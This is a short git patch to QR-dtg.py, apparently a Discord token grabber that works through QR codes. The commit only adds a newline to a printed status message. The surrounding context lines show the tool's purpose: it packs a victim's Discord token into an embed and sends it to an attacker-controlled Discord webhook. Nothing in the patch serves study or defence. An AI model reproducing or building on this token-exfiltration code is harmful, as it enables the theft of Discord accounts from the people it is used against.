From 780e6bd666c5a1df7bebad3f2272cf08477764a8 Mon Sep 17 00:00:00 2001 From: mouadessalim <38190847+mouadessalim@users.noreply.github.com> Date: Thu, 25 Aug 2022 18:32:56 +0100 Subject: [PATCH] New GUI for the app --- QR-dtg.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/QR-dtg.py b/QR-dtg.py index 2f72b16..eb5596f 100644 --- a/QR-dtg.py +++ b/QR-dtg.py @@ -116,7 +116,7 @@ def main(webhook_url) -> None: embed.add_embed_field(name='Token', value=f"```yaml\n{token}\n```", inline=False) webhook.add_embed(embed) embed.set_footer(text='By Luci (9P9), Lemon.-_-.#3714, the-cult-of-integral and mte0', inline=False) - Write.Print("[!]Sending data to discord webhook...", Colors.red_to_purple) + Write.Print("\n[!]Sending data to discord webhook...", Colors.red_to_purple) webhook.execute() Write.Input('\n\nPress any button to quit.', Colors.blue_to_green)